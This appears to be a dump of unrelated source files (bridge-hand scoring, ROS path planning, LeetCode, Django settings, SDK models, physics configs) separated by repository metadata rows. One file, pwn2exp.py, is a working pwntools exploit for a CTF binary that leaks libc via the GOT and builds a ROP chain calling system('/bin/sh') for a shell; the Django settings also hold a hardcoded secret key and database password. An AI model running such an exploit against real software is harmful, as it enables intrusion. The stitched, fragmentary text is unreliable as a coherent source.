""" Return the number of singletons contained in this hand """
singletons = 0
for suit_holding in self.__str__().split():
if len(suit_holding.strip().split(':')[1]) == 1:
singletons += 1
return singletons
@property
def voids(self) -> int:
""" Return the number of voids (missing suits) contained in
this hand
"""
non_voids = 0
for suit_holding in self.__str__().split():
non_voids += 1
return 4 - non_voids
@property
def ssp(self) -> int:
""" Return the number of short suit points in this hand.
Doubletons are worth one point, singletons two points,
voids 3 points
"""
return self.doubletons * 1 + self.singletons * 2 + self.voids * 3
@property
def total_points(self) -> int:
""" Return the total points (hcp and ssp) contained in this hand """
return self.hcp + self.ssp
@property
def ltc(self) -> int:
""" Return the losing trick count for this hand - see bite description
for the procedure
"""
ltc = 0
for suit_holding in self.__str__().split():
# singletons
if len(suit_holding.strip().split(':')[1]) == 1:
for c in suit_holding.strip().split(':')[1]:
if c == 'A':
ltc += 0
else:
ltc += 1
# doubletons
if len(suit_holding.strip().split(':')[1]) == 2:
d_cards = suit_holding.strip().split(':')[1]
if d_cards == 'AK':
ltc += 0
elif d_cards[0] == 'A' or d_cards[0] == 'K':
ltc += 1
elif d_cards[0] == 'Q':
ltc += 2
else:
ltc += 2
# 3 card suit
if len(suit_holding.strip().split(':')[1]) >= 3:
t_cards = suit_holding.strip().split(':')[1][:3]
if t_cards == 'AKQ':
ltc += 0
elif t_cards[:2] == 'AK' or t_cards[:2] == 'AQ' or t_cards[:2] == 'KQ':
ltc += 1
elif t_cards[0] == 'A' or t_cards[0] == 'K' or t_cards[0] == 'Q':
ltc += 2
else:
ltc += 3
return ltc
| [
"nhegde@netflix.com"
] | nhegde@netflix.com |
f60397de642e3f12a66fcdec6cae5c94fd5de495 | 7185ae54efb2ce9ecd4bd9c53057053f6e799ae3 | /PWN/some/2019年7月17日-pwn-(水+ok+cpp)/pwn02/pwn2exp.py | 24a3645e72b65dccd0dcc3936b7502a14b8fcc14 | [] | no_license | 0xFF1E071F/CTFchallenge | 1b259c3f7cf8f7a1c20ea38cadd8f170bff137d1 | 12bb31a202b6110c05758fc4d57cfb58c98d9f23 | refs/heads/master | 2022-04-07T03:34:46.241887 | 2020-03-02T00:22:37 | 2020-03-02T00:22:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | from pwn import *
context.log_level = 'debug'
p = process("./pwn02")
e = ELF("./pwn02")
p.recvuntil("time?\n")
p.sendline("134520896")
p.recvuntil("time?\n")
p.sendline('10000')
pop_ret = 0x0804898b
ppp_ret = 0x08048989
addr = 0x0804A058
payload = '1234' * 8
payload += p32(e.plt['read']) + p32(ppp_ret) + p32(0) + p32(addr) + p32(
4) + p32(0x080486FD)
p.recvuntil("ASLR\n")
p.sendline(payload)
p.sendline(p32(e.got['putchar']))
p.recvuntil("time?\n")
p.sendline("134520896")
p.recvuntil("time?\n")
p.sendline('10000')
p.recvuntil('\x0a')
libc_base = u32(p.recv(4)) - 0x60da0
libc_system = libc_base + 0x3a940
libc_binsh = libc_base + 0x15902b
payload = '1234' * 8
payload += p32(libc_system) + p32(pop_ret) + p32(libc_binsh)
p.sendline(payload)
p.interactive()
| [
"mozhaohua1999@outlook.com"
] | mozhaohua1999@outlook.com |
fd1fcb904335972d230abf0e0b9f8fa1588452ca | 695c1667d2b2b57ccb526cc2817bbe5c4038de5c | /navigator/src/plan.py | 24dac9a6c5d361b969b4178a7bd74b3b55573e2d | [] | no_license | Avinash-1501/cse550 | a6f18e2f84fd47595af994aa81b95fc20e9a311e | 36037193af4c7ac2af282471a66c064af3c6a0f4 | refs/heads/master | 2021-05-29T06:40:56.356026 | 2015-04-29T19:26:18 | 2015-04-29T19:26:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,668 | py | #!/usr/bin/python
import roslib; roslib.load_manifest('navigator')
from assignment05.path_planning import *
from navigator import *
# Parse Args
parser = argparse.ArgumentParser(description='Path Plan')
parser.add_argument('mapbag')
args = parser.parse_args(rospy.myargv()[1:])
# Get Data From Bag Files
the_map = get_dict( args.mapbag )['/map']
rospy.init_node('path_plan')
mpub = rospy.Publisher('/map', OccupancyGrid, latch=True)
mpub.publish(the_map)
ppub = rospy.Publisher('/start_pose', PoseStamped, latch=True)
path_pub = rospy.Publisher('/path', Path)
start_pose = None
goal_pose = None
def plan():
if start_pose is None or goal_pose is None:
return
result = to_grid2(start_pose[0],start_pose[1], the_map)
if not result:
print "INVALID START POSE"
return
else:
sx, sy = result
result = to_grid2(goal_pose[0],goal_pose[1], the_map)
if not result:
print "INVALID GOAL POSE"
return
else:
gx, gy = result
X = plan_path(sx, sy, gx, gy, the_map)
if X:
path_pub.publish(to_path(X, the_map))
else:
print "NO PATH"
def goal_sub(msg):
global goal_pose
goal_pose = to_tuple(msg.pose.position, msg.pose.orientation)
plan()
def start_sub(msg):
global start_pose
start_pose = to_tuple(msg.pose.pose.position, msg.pose.pose.orientation)
ps = PoseStamped()
ps.header = msg.header
ps.pose = apply(to_pose, start_pose)
ppub.publish(ps)
plan()
sub = rospy.Subscriber('/goal_pose', PoseStamped, goal_sub)
sub2 = rospy.Subscriber('/initialpose', PoseWithCovarianceStamped, start_sub)
rospy.spin()
| [
"davidvlu@gmail.com"
] | davidvlu@gmail.com |
b59d20addda1b62a145dcbfe767a7c76a7c061be | ad4c2aa0398406ccb7e70562560e75fa283ffa1a | /sum-of-left-leaves/sum-of-left-leaves.py | e9eb62561a866708b2384dbdd88bb0c50858d9ac | [
"Apache-2.0"
] | permissive | kmgowda/kmg-leetcode-python | 427d58f1750735618dfd51936d33240df5ba9ace | 4d32e110ac33563a8bde3fd3200d5804db354d95 | refs/heads/main | 2023-08-22T06:59:43.141131 | 2021-10-16T14:04:32 | 2021-10-16T14:04:32 | 417,841,590 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 746 | py | // https://leetcode.com/problems/sum-of-left-leaves
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def sumOfLeftLeaves(self, root):
"""
:type root: TreeNode
:rtype: int
"""
self.total = 0
def sumLeftleaf(root, isleft):
if root:
if not root.left and not root.right:
if isleft:
self.total+=root.val
sumLeftleaf(root.left, True)
sumLeftleaf(root.right, False)
sumLeftleaf(root, False)
return self.total | [
"keshava.gowda@gmail.com"
] | keshava.gowda@gmail.com |
1105ec0b1ddb15924ebfc28ab85fa00d3efaa6f1 | 6baab869e16ed7cafdea7e0e68f27b7e0fc1c2ee | /demo_class/demo_5.py | 7feb701538b28b26283d5f7e1471c99811bbe084 | [] | no_license | SkewwG/Python_demo | ad4bd81207619bff23498b41833bc45695eab164 | 9357645287cc49d3396bd65062b71ac646076979 | refs/heads/master | 2021-05-03T05:21:56.685496 | 2018-07-06T00:02:59 | 2018-07-06T00:02:59 | 120,637,210 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | def demo_yield(n):
print('cunting')
while n > 0:
print('before')
yield n
n -= 1
print('afeter')
print(demo_yield(5).__next__()) | [
"446106525@qq.com"
] | 446106525@qq.com |
43fa50129b5df8f91bad45446acac3e2c063f1d9 | ef6229d281edecbea3faad37830cb1d452d03e5b | /ucsmsdk/mometa/extpol/ExtpolControllerCont.py | ae30d6ff188351082a4f0e1dd925a6370910ef71 | [
"Apache-2.0"
] | permissive | anoop1984/python_sdk | 0809be78de32350acc40701d6207631322851010 | c4a226bad5e10ad233eda62bc8f6d66a5a82b651 | refs/heads/master | 2020-12-31T00:18:57.415950 | 2016-04-26T17:39:38 | 2016-04-26T17:39:38 | 57,148,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,257 | py | """This module contains the general information for ExtpolControllerCont ManagedObject."""
import sys, os
from ...ucsmo import ManagedObject
from ...ucscoremeta import UcsVersion, MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class ExtpolControllerContConsts():
pass
class ExtpolControllerCont(ManagedObject):
"""This is ExtpolControllerCont class."""
consts = ExtpolControllerContConsts()
naming_props = set([])
mo_meta = MoMeta("ExtpolControllerCont", "extpolControllerCont", "controllers", VersionMeta.Version211a, "InputOutput", 0x1f, [], ["admin"], [u'extpolRegistry'], [u'extpolController'], ["Get"])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"gen_num": MoPropertyMeta("gen_num", "genNum", "uint", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x8, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version211a, MoPropertyMeta.READ_WRITE, 0x10, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
}
prop_map = {
"childAction": "child_action",
"dn": "dn",
"genNum": "gen_num",
"rn": "rn",
"sacl": "sacl",
"status": "status",
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.child_action = None
self.gen_num = None
self.sacl = None
self.status = None
ManagedObject.__init__(self, "ExtpolControllerCont", parent_mo_or_dn, **kwargs)
| [
"test@cisco.com"
] | test@cisco.com |
d0a35e213f17e748c12586e0e2841ee69e1ff8ad | 43e3f2169a88daedf915fae594412b993f1a4ec2 | /execptions.py | 8a46a0c01b3874e86f28bb0391dff54b5168297e | [] | no_license | Wanted-Preonboarding-Backend-1st-G5/Assignment5 | 756037cbe94eb245f743898487fb48d2f0ab44e6 | 967220f04da4ec84d370c59ef9636fae3e3fbb56 | refs/heads/main | 2023-09-02T08:49:57.839875 | 2021-11-18T00:03:00 | 2021-11-18T00:03:00 | 428,106,477 | 0 | 5 | null | 2021-11-16T17:19:44 | 2021-11-15T03:09:21 | Python | UTF-8 | Python | false | false | 104 | py | class FileExtensionNotMatchError(Exception):
def __init__(self, msg):
super().__init__(msg)
| [
"embedded61@gmail.com"
] | embedded61@gmail.com |
5c2f4032248c9ab25d6bf54b79381af856bb74b5 | 759c447b4cc7105096983eadb87d667ae472d6c0 | /acme_diags/plot/colormaps/rewrite_from_colorcet.py | fa6946bff0a7c3ea3f15a0ac5cbcc5d39bfc6ac5 | [
"BSD-3-Clause"
] | permissive | kaabre/acme_diags | cd41014ee0f023eb8796c1ac414615be0fe99f53 | 40364724ce46f1e5ec91201764da1de593a1a5f0 | refs/heads/master | 2021-05-14T17:32:19.577633 | 2018-02-09T20:29:49 | 2018-02-09T20:29:49 | 116,049,920 | 0 | 0 | null | 2018-01-02T19:34:12 | 2018-01-02T19:34:12 | null | UTF-8 | Python | false | false | 763 | py | try:
import colorcet
except BaseException:
print "Cannot convert from colorcet w/o colorcet"
import sys
sys.exit()
all_cms = colorcet.cm
def dump_cmap(name, mpl_cmap):
nm = "cet_%s" % name
with open("%s.rgb" % nm, "w") as f:
f.write("# Converted from colorcet\n")
f.write("#\n")
f.write("# number of colors in table\n")
f.write("#ncolors = %i\n" % mpl_cmap.N)
f.write("#\n")
f.write("# r g b\n")
for i in range(mpl_cmap.N):
a = float(i) / float(mpl_cmap.N - 1)
r, g, b, a = [int(x * 255) for x in mpl_cmap(a)]
f.write(" %3s %3s %3s\n" % (r, g, b))
print "Wrote %s" % nm
for cmap in all_cms.keys():
dump_cmap(cmap, all_cms[cmap])
| [
"doutriaux1@llnl.gov"
] | doutriaux1@llnl.gov |
d74f5f77d2d099686d4658eabd6ee585ea46da9f | 4ad0dddd7a6e29b31d5780bf6dec6ebad776cf73 | /SimG4CMS/HGCalTestBeam/test/HGCalTBCERN170_cfg.py | d30e37913859424152ef656058b1ddaa63fd7e67 | [
"Apache-2.0"
] | permissive | llechner/cmssw | 95dcd6ae0ced5546853778c6ebdf0dd224030215 | 419d33be023f9f2a4c56ef4b851552d2d228600a | refs/heads/master | 2020-08-26T20:20:28.940065 | 2018-10-18T09:24:51 | 2018-10-18T09:24:51 | 131,112,577 | 0 | 0 | Apache-2.0 | 2019-10-23T17:59:17 | 2018-04-26T06:51:19 | C++ | UTF-8 | Python | false | false | 4,988 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process('SIM')
# import of standard configurations
process.load("FWCore.MessageService.MessageLogger_cfi")
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('SimGeneral.MixingModule.mixNoPU_cfi')
process.load('SimG4CMS.HGCalTestBeam.HGCalTB170JulyXML_cfi')
process.load('Geometry.HGCalCommonData.hgcalNumberingInitialization_cfi')
process.load('Geometry.HGCalCommonData.hgcalParametersInitialization_cfi')
process.load('Configuration.StandardSequences.MagneticField_0T_cff')
process.load('Configuration.StandardSequences.Generator_cff')
process.load('IOMC.EventVertexGenerators.VtxSmearedFlat_cfi')
process.load('GeneratorInterface.Core.genFilterSummary_cff')
process.load('Configuration.StandardSequences.SimIdeal_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.load('SimG4CMS.HGCalTestBeam.HGCalTBCheckGunPosition_cfi')
process.load('SimG4CMS.HGCalTestBeam.HGCalTBAnalyzer_cfi')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(10)
)
if 'MessageLogger' in process.__dict__:
process.MessageLogger.categories.append('HGCSim')
process.MessageLogger.categories.append('HcalSim')
# Input source
process.source = cms.Source("EmptySource")
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('SingleMuonE200_cfi nevts:10'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
process.RAWSIMoutput = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('generation_step')
),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('GEN-SIM'),
filterName = cms.untracked.string('')
),
eventAutoFlushCompressedSize = cms.untracked.int32(5242880),
fileName = cms.untracked.string('file:gensim.root'),
outputCommands = process.RAWSIMEventContent.outputCommands,
splitLevel = cms.untracked.int32(0)
)
# Additional output definition
process.TFileService = cms.Service("TFileService",
fileName = cms.string('TBGenSim.root')
)
# Other statements
process.genstepfilter.triggerConditions=cms.vstring("generation_step")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc', '')
process.generator = cms.EDProducer("FlatRandomEThetaGunProducer",
AddAntiParticle = cms.bool(False),
PGunParameters = cms.PSet(
MinE = cms.double(99.99),
MaxE = cms.double(100.01),
MinTheta = cms.double(0.0),
MaxTheta = cms.double(0.0),
MinPhi = cms.double(-3.14159265359),
MaxPhi = cms.double(3.14159265359),
PartID = cms.vint32(13)
),
Verbosity = cms.untracked.int32(0),
firstRun = cms.untracked.uint32(1),
psethack = cms.string('single muon E 100')
)
process.VtxSmeared.MinZ = -800.0
process.VtxSmeared.MaxZ = -800.0
process.VtxSmeared.MinX = -7.5
process.VtxSmeared.MaxX = 7.5
process.VtxSmeared.MinY = -7.5
process.VtxSmeared.MaxY = 7.5
process.g4SimHits.HGCSD.RejectMouseBite = True
process.g4SimHits.HGCSD.RotatedWafer = True
process.g4SimHits.Watchers = cms.VPSet(cms.PSet(
HGCPassive = cms.PSet(
LVNames = cms.vstring('HGCalEE','HGCalHE','HGCalAH', 'CMSE'),
MotherName = cms.string('CMSE'),
),
type = cms.string('HGCPassive'),
)
)
process.HGCalTBAnalyzer.DoDigis = False
process.HGCalTBAnalyzer.DoRecHits = False
process.HGCalTBAnalyzer.UseFH = True
process.HGCalTBAnalyzer.UseBH = True
process.HGCalTBAnalyzer.UseBeam = True
process.HGCalTBAnalyzer.ZFrontEE = 1110.0
process.HGCalTBAnalyzer.ZFrontFH = 1172.3
process.HGCalTBAnalyzer.DoPassive = True
# Path and EndPath definitions
process.generation_step = cms.Path(process.pgen)
process.gunfilter_step = cms.Path(process.HGCalTBCheckGunPostion)
process.simulation_step = cms.Path(process.psim)
process.genfiltersummary_step = cms.EndPath(process.genFilterSummary)
process.analysis_step = cms.Path(process.HGCalTBAnalyzer)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.RAWSIMoutput_step = cms.EndPath(process.RAWSIMoutput)
# Schedule definition
process.schedule = cms.Schedule(process.generation_step,
process.genfiltersummary_step,
process.simulation_step,
process.gunfilter_step,
process.analysis_step,
process.endjob_step,
process.RAWSIMoutput_step,
)
# filter all path with the production filter sequence
for path in process.paths:
getattr(process,path)._seq = process.generator * getattr(process,path)._seq
| [
"sunanda.banerjee@cern.ch"
] | sunanda.banerjee@cern.ch |
258ba757b7cd1250e8a2e1abe6391c275e180530 | 719fb168fdace7548c719a6d998b71bb15525d6c | /src/kinya/settings.py | baffe196271147d4a3a1787b16e0169cf7139ce7 | [] | no_license | nicpottier/kinya | 858b19f9d8891c4be80d8ecce477fbfd5c747a8e | e3f9ee774fcb00f916911df986f61e8f8a78f188 | refs/heads/master | 2016-09-05T21:18:03.141403 | 2011-05-23T18:19:20 | 2011-05-23T18:19:20 | 783,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,117 | py | # Django settings for kinya project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Nicolas Pottier', 'nicp@nyaruka.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'kinya',
'USER': 'kinya', # Not used with sqlite3.
'PASSWORD': 'murakoze', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../static')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/static/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = 's7=@35q5k6wzfmrhn7=1l27s$z&0k&dawsuu65q2)i*^tb3rkvasdf'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'kinya.urls'
TEMPLATE_DIRS = (
os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../templates')
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'kinya.lessons',
)
| [
"nicpottier@gmail.com"
] | nicpottier@gmail.com |
453465980126de4e0addd9466aa1fb4eb7709d95 | 452b8b849e080cda5a26f4018cafa5a674ff7c20 | /froide/account/migrations/0003_auto_20160125_2127.py | 284973b0045128333fd564ec7053b4d1ea74536a | [
"MIT"
] | permissive | okffi/tietopyynto | 1262dcaf748c41b49be4a774be552fc75fc9b336 | 66b7e7dbf3c3395d79af3da85b3b58f01fad62dc | refs/heads/tietopyynto | 2021-01-17T21:07:04.829856 | 2016-10-30T19:26:53 | 2016-10-30T19:26:53 | 14,255,294 | 3 | 2 | MIT | 2021-01-05T11:51:18 | 2013-11-09T10:19:16 | Python | UTF-8 | Python | false | false | 688 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('account', '0002_auto_20150729_0828'),
]
operations = [
migrations.AddField(
model_name='user',
name='date_left',
field=models.DateTimeField(default=None, null=True, verbose_name='date left', blank=True),
),
migrations.AddField(
model_name='user',
name='is_deleted',
field=models.BooleanField(default=False, help_text='Designates whether this user was deleted.', verbose_name='deleted'),
),
]
| [
"mail@stefanwehrmeyer.com"
] | mail@stefanwehrmeyer.com |
6f40c592f87d09d6a2d046b25fabd3e80395a695 | 118984fdbacf5eb71159eb511ccd055987498886 | /CH11/EX11.38.py | a2c179da5ac2a5a4bd3de019820e3260ddb8588a | [] | no_license | 6igsm0ke/Introduction-to-Programming-Using-Python-Liang-1st-edtion | 321c6256be6ff78adbc8e3ddc73f2f43a51a75ab | 159489f3af296f87469ddddf3a1cb232917506b0 | refs/heads/master | 2023-06-05T20:03:17.951911 | 2021-06-18T18:04:42 | 2021-06-18T18:04:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,372 | py | # 11.38 (Turtle: draw a polygon/polyline) Write the following functions that draw a
# polygon/polyline to connect all points in the list. Each element in the list is a list of
# two coordinates.
# # Draw a polyline to connect all the points in the list
# def drawPolyline(points):
# # Draw a polygon to connect all the points in the list and
# # close the polygon by connecting the first point with the last point
# def drawPolygon(points):
# # Fill a polygon by connecting all the points in the list
# def fillPolygon(points):
import turtle
# Draw a polyline to connect all the points in the list
def drawPolyline(points):
for i in range(len(points) - 1):
drawLine(points[i], points[i + 1])
# Draw a polygon to connect all the points in the list and
# close the polygon by connecting the first point with the last point
def drawPolygon(points):
drawPolyline(points)
drawLine(points[len(points) - 1], points[0]) # Close the polygon
# Fill a polygon by connecting all the points in the list
def fillPolygon(points):
turtle.begin_fill()
drawPolygon(points)
turtle.end_fill()
# Draw a line from (x1, y1) to (x2, y2)
def drawLine(x1, y1, x2, y2):
turtle.penup()
turtle.goto(x1, y1)
turtle.pendown()
turtle.goto(x2, y2)
points = input("Enter points: ").split()
points = [eval(p) for p in points]
drawPolygon(points) | [
"47993441+OmarAlmighty@users.noreply.github.com"
] | 47993441+OmarAlmighty@users.noreply.github.com |
10662b2839c963e9c42342a502361677ede604d6 | 104a0ec7cfb5d4bf948f22b47edb59122a886363 | /input/kinetics/families/intra_substitutionCS_cyclization/depository.py | d3a115a1158e51d03bfd7a044c1ccccb5d030255 | [] | no_license | nickvandewiele/RMG-database | 3afbe88df46a5641c6abbaf032bf4a0b6b9aae73 | dc3cbc7048501d730062426a65d87ea452e8705f | refs/heads/master | 2020-12-25T08:19:49.436773 | 2014-08-04T21:37:26 | 2014-08-04T21:37:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 131 | py | #!/usr/bin/env python
# encoding: utf-8
name = "intra_substitutionCS_cyclization/depository"
shortDesc = u""
longDesc = u"""
"""
| [
"jwallen@mit.edu"
] | jwallen@mit.edu |
4b18e558dc27eafa6c869c000bf0f0e6270df667 | 19d47d47c9614dddcf2f8d744d883a90ade0ce82 | /pynsxt/swagger_client/models/lb_source_ip_persistence_profile.py | 3b76026eb4c6d08312a91366ab687f7d0bcdcb0c | [] | no_license | darshanhuang1/pynsxt-1 | 9ed7c0da9b3a64e837a26cbbd8b228e811cee823 | fb1091dff1af7f8b8f01aec715682dea60765eb8 | refs/heads/master | 2020-05-25T14:51:09.932853 | 2018-05-16T12:43:48 | 2018-05-16T12:43:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,200 | py | # coding: utf-8
"""
NSX API
VMware NSX REST API # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.lb_persistence_profile import LbPersistenceProfile # noqa: F401,E501
from swagger_client.models.resource_link import ResourceLink # noqa: F401,E501
from swagger_client.models.self_resource_link import SelfResourceLink # noqa: F401,E501
from swagger_client.models.tag import Tag # noqa: F401,E501
class LbSourceIpPersistenceProfile(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'purge': 'str',
'ha_persistence_mirroring_enabled': 'bool',
'timeout': 'int'
}
attribute_map = {
'purge': 'purge',
'ha_persistence_mirroring_enabled': 'ha_persistence_mirroring_enabled',
'timeout': 'timeout'
}
def __init__(self, purge='FULL', ha_persistence_mirroring_enabled=False, timeout=300): # noqa: E501
"""LbSourceIpPersistenceProfile - a model defined in Swagger""" # noqa: E501
self._purge = None
self._ha_persistence_mirroring_enabled = None
self._timeout = None
self.discriminator = None
if purge is not None:
self.purge = purge
if ha_persistence_mirroring_enabled is not None:
self.ha_persistence_mirroring_enabled = ha_persistence_mirroring_enabled
if timeout is not None:
self.timeout = timeout
@property
def purge(self):
"""Gets the purge of this LbSourceIpPersistenceProfile. # noqa: E501
persistence purge setting # noqa: E501
:return: The purge of this LbSourceIpPersistenceProfile. # noqa: E501
:rtype: str
"""
return self._purge
@purge.setter
def purge(self, purge):
"""Sets the purge of this LbSourceIpPersistenceProfile.
persistence purge setting # noqa: E501
:param purge: The purge of this LbSourceIpPersistenceProfile. # noqa: E501
:type: str
"""
allowed_values = ["NO_PURGE", "FULL"] # noqa: E501
if purge not in allowed_values:
raise ValueError(
"Invalid value for `purge` ({0}), must be one of {1}" # noqa: E501
.format(purge, allowed_values)
)
self._purge = purge
@property
def ha_persistence_mirroring_enabled(self):
"""Gets the ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile. # noqa: E501
Persistence entries are not synchronized to the HA peer by default. # noqa: E501
:return: The ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile. # noqa: E501
:rtype: bool
"""
return self._ha_persistence_mirroring_enabled
@ha_persistence_mirroring_enabled.setter
def ha_persistence_mirroring_enabled(self, ha_persistence_mirroring_enabled):
"""Sets the ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile.
Persistence entries are not synchronized to the HA peer by default. # noqa: E501
:param ha_persistence_mirroring_enabled: The ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile. # noqa: E501
:type: bool
"""
self._ha_persistence_mirroring_enabled = ha_persistence_mirroring_enabled
@property
def timeout(self):
"""Gets the timeout of this LbSourceIpPersistenceProfile. # noqa: E501
When all connections complete (reference count reaches 0), persistence entry timer is started with the expiration time. # noqa: E501
:return: The timeout of this LbSourceIpPersistenceProfile. # noqa: E501
:rtype: int
"""
return self._timeout
@timeout.setter
def timeout(self, timeout):
"""Sets the timeout of this LbSourceIpPersistenceProfile.
When all connections complete (reference count reaches 0), persistence entry timer is started with the expiration time. # noqa: E501
:param timeout: The timeout of this LbSourceIpPersistenceProfile. # noqa: E501
:type: int
"""
if timeout is not None and timeout < 1: # noqa: E501
raise ValueError("Invalid value for `timeout`, must be a value greater than or equal to `1`") # noqa: E501
self._timeout = timeout
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, LbSourceIpPersistenceProfile):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"tcraft@pivotal.io"
] | tcraft@pivotal.io |
2e9d6ec76fdcc93c8746e3531462d5bf552016ea | 1c0509a06cec726735048f00f63d2529f5e43ce6 | /code_gasoline_france/analysis/analysis_total_access/reaction_analysis/overview_reactions_ronan.py | a4370f2b3423402edfeb364a2abc89faf8a13f2c | [] | no_license | etiennecha/master_code | e99c62e93aa052a66d4cdd3f3e3aa25a3aec4880 | 48821f6c854a1c6aa05cf81b653b3b757212b6f8 | refs/heads/master | 2021-01-23T14:35:45.904595 | 2018-03-11T18:57:38 | 2018-03-11T18:57:38 | 16,312,906 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,747 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
import add_to_path
from add_to_path import path_data
from generic_master_price import *
from generic_master_info import *
import matplotlib.pyplot as plt
